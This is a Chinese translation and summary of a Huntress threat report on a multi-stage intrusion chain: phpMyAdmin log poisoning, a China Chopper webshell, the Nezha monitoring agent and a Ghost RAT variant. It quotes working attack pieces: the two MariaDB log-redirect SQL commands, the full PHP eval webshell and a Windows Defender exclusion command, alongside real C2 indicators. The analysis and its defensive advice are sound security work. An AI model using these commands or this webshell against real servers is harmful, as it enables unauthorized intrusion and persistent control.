本文章转自网络安全公司Huntress，原文连接：The Crown Prince, Nezha: A New Tool Favored by China-Nexus Threat Actors，文章经过豆包AI抓取翻译提炼。

该网页是网络安全公司 Huntress 于2025年10月15日发布的威胁分析报告，详细披露了一起利用新型工具“哪吒（Nezha）”发起的多阶段网络攻击事件，核心内容可分为攻击过程、关键工具、攻击主体争议、受害者分布及安全建议等部分。

一、攻击背景与核心发现

2025年8月起，Huntress 监测到一起技术成熟的网络攻击：威胁 actors 利用“日志注入（log poisoning）”技术在Web服务器植入“中国菜刀（China Chopper）” webshell，随后通过“蚁剑（AntSword）”控制服务器，最终部署哪吒（Nezha） 运维监控工具，并进一步植入 Ghost RAT（远程控制木马） 实现持久化控制。
这是首次公开报告“哪吒”被用于辅助Web入侵，且攻击波及超100台受害设备，凸显公开工具被恶意滥用的风险。

二、完整攻击流程拆解

攻击分4个关键阶段，每个阶段均有明确技术细节和日志证据：

1. 初始入侵：利用phpMyAdmin漏洞突破防线

• 入口点：威胁 actors 通过暴露在公网的 phpMyAdmin 面板入侵（默认配置无认证，且因DNS变更意外对外公开）。
• IP与归属：初始访问IP为 54.46.50.255，属于亚马逊香港数据中心（ASN：16509）。
• 操作痕迹：进入后立即将界面语言切换为“简体中文”，并通过SQL查询接口执行命令，暴露其语言使用习惯。

2. 植入Webshell：日志注入技术的实际应用

• 核心操作：通过两条SQL命令篡改MariaDB日志配置，将日志文件伪装成PHP文件（123.php）并写入webshell代码：

  1. SET GLOBAL general_log_file = '../../htdocs/123.php';（目录穿越，将日志写入Web可访问目录）
  2. SET GLOBAL general_log = 'ON';（开启日志记录，使SQL查询命令被写入123.php）
• webshell代码：植入的PHP代码可接收HTTP请求并执行任意命令，格式为：
  <?php class user{function ddd($name){eval($this->name=$name);}}$me=new user; $me->ddd("$_REQUEST[1]");?>
  该代码与“蚁剑”工具的终端功能高度匹配，后续威胁 actors 通过45.207.220.12IP持续发送POST请求控制服务器。

3. 部署“哪吒（Nezha）”：从运维工具到攻击跳板

• 下载与配置：威胁 actors 将工作目录切换至C:\Windows\Cursors（Windows合法光标目录，隐蔽性强），从rism.pages.dev下载live.exe（哪吒代理程序）和config.yml（配置文件）。

• 哪吒的作用：作为开源运维工具，哪吒本用于服务器监控和命令执行，此处被用于：

  1. 批量管理受害设备（通过c.mid.al:80地址连接C2服务器，该域名指向爱尔兰HostPapa的VPS）；
  2. 为后续植入Ghost RAT铺路（通过哪吒启动高权限PowerShell会话）。
• 可视化证据：哪吒控制台显示受害设备超135台，界面语言为俄语，且支持查看设备CPU、内存、网络流量等信息。

4. 植入Ghost RAT：实现持久化控制

• 规避防御：通过哪吒启动的PowerShell执行命令 Add-MpPreference -ExclusionPath 'C:\WINDOWS'，禁用Windows Defender对系统目录的扫描。

• 木马部署：运行x.exe（Ghost RAT变体），并通过以下方式实现持久化：

  1. 创建名为“SQLlite”的服务（拼写故意错误，伪装成数据库服务）；
  2. 将恶意DLL（32138546.dll）放入C:\Windows\system32，通过篡改的rundll32.exe（重命名为SQLlite.exe）加载；
  3. 建立互斥量（gd.bj2.xyz:53762:SQLlite）标记感染状态，避免重复植入。
• C2关联：Ghost RAT通过gd.bj2.xyz域名通信，该域名解析至45.207.220.12，与控制webshell的IP一致，且域名注册信息曾关联中国北京、广东地区。

三、关键主体与争议：是“地缘政治动机”还是“VPS爱好者行为”？

报告中存在两种对攻击主体的说法，暂未完全验证：

1. Huntress 初始推测：中国关联威胁 actors

• 依据：

  • 攻击工具（中国菜刀、蚁剑）、语言选择（简体中文）、受害区域（集中在与中国有地缘争议的地区）；
  • 关联实体 MoeDove LLC（ASN：53808）曾有中国ICP备案（萌ICP备20244324号），官网曾链接中国游戏《原神》，且提供“免费VPS”服务，疑似用于绕过网络限制。

2. 匿名人士反驳：中国VPS爱好者的“非恶意行为”

• 核心观点：一位自称了解情况的中国大陆匿名人士联系Huntress，称攻击并非地缘政治驱动，而是：

  • 中国大陆“VPS爱好者群体”为绕过“防火长城”，通过入侵境外服务器获取资源；
  • “哪吒”是该群体常用的VPS管理工具，MoeDove LLC由另一位VPS爱好者运营，仅提供技术支持而非恶意攻击；
  • 动机是“获取更多服务器”或“实验性操作”，而非“恶意破坏或政治目的”。

3. Huntress 态度

暂未独立验证匿名人士的说法，但发现一个超9400人的Telegram频道，该频道自2021年起分享VPS技巧、低价资源，成员构成复杂，无法排除部分人滥用技术的可能。

四、受害者分布与特征

1. 地理集中性：与地缘争议区域高度重合

受害设备主要分布在以下地区（按数量排序）：

2. 设备特征

• 不仅有服务器，还包括大量桌面系统（如Windows 10/11 Pro），甚至有运行OpenWRT的嵌入式设备（内存极小，仅用于基础网络功能）；
• 部分受害设备的“上线-下线”时间仅间隔几小时，说明部分机构已快速响应清除威胁。

五、核心IOC（威胁指标）：用于检测与防御

六、安全建议

1. 加固公网应用：禁用phpMyAdmin等管理面板的公网访问，强制开启认证，避免使用默认配置；
2. 监控异常行为：关注“日志文件伪装成可执行格式”“合法目录（如C:\Windows\Cursors）出现不明exe”等异常；
3. 警惕开源工具滥用：哪吒、蚁剑等工具虽有合法用途，但需监控其非授权部署（如无运维需求却出现相关进程）；
4. 及时更新系统：避免使用已停止支持（EoL）的软件（如案例中XAMPP捆绑的MariaDB 10.4.32），减少漏洞暴露。

总结

该报告揭示了“公开工具武器化”的典型攻击模式：威胁 actors 利用合法运维工具（哪吒）的隐蔽性、开源工具（蚁剑）的易用性，结合漏洞（phpMyAdmin配置缺陷）和社会工程学（语言选择、目录伪装），构建多阶段攻击链。尽管攻击主体的动机存在争议，但“无论目的是绕过限制还是恶意破坏，未授权控制服务器均构成严重安全风险”是明确结论，也为企业防御此类攻击提供了清晰的技术对抗方向。